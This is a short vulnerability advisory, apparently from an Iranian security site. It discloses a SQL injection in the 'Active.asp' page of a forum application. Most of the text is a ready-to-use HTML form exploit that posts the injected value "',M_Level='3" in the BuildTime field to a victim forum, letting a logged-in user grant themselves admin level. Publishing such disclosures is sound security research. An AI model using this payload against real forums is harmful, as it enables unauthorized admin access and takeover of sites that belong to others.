########################## WwW.BugReport.ir #########################
######################## Bug Description ###########################
A user can gain admin level in the forum and can access to the forum.
It is because of a SQL Injection in "Active.asp"
After login to your VICTIM forum, execute below script
<form action="http://[VICTIM URL]/active.asp" method="post">
Query: <input type="text" name="BuildTime" value="',M_Level='3" /><br />
DefaultValues: <input type="text" name="AllRead" value="Y" /><br />
Submit: <input type="submit" name="submit" value="Submit" /><br />
</form>
~~~~~~~~~~~~End HTML Exploit~~~~~~~~~
#####################################################################
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact: [email protected]
# Credit: Soroush Dalili found this bug.
#####################################################################